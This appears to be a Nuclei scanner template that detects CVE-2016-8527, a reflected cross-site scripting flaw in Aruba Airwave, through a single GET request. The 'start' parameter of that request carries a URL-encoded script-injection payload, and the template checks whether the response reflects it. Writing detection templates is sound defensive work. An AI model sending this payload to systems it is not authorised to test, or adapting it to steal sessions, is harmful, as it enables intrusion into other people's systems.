id: CVE-2016-8527

info:
  name: Aruba Airwave <8.2.3.1 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: Aruba Airwave before version 8.2.3.1 is vulnerable to reflected cross-site scripting.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade Aruba Airwave to version 8.2.3.1 or later to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/41482
    - http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt
    - https://www.exploit-db.com/exploits/41482/
    - https://nvd.nist.gov/vuln/detail/CVE-2016-8527
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-8527
    cwe-id: CWE-79
    epss-score: 0.00166
    epss-percentile: 0.53225
    cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: hp
    product: airwave
  tags: cve2016,cve,aruba,xss,edb,hp

http:
  - method: GET
    path:
      - "{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e0553f487ee2d58071813a5309f9348e9ca2cdaac784386a59e8c2d365bd1b7b022100de464f52b41938c66aeb7e2a014a9e466ad67eab9b926ec68cf7196538177e40:922c64590222798bb761d5b6d8e72950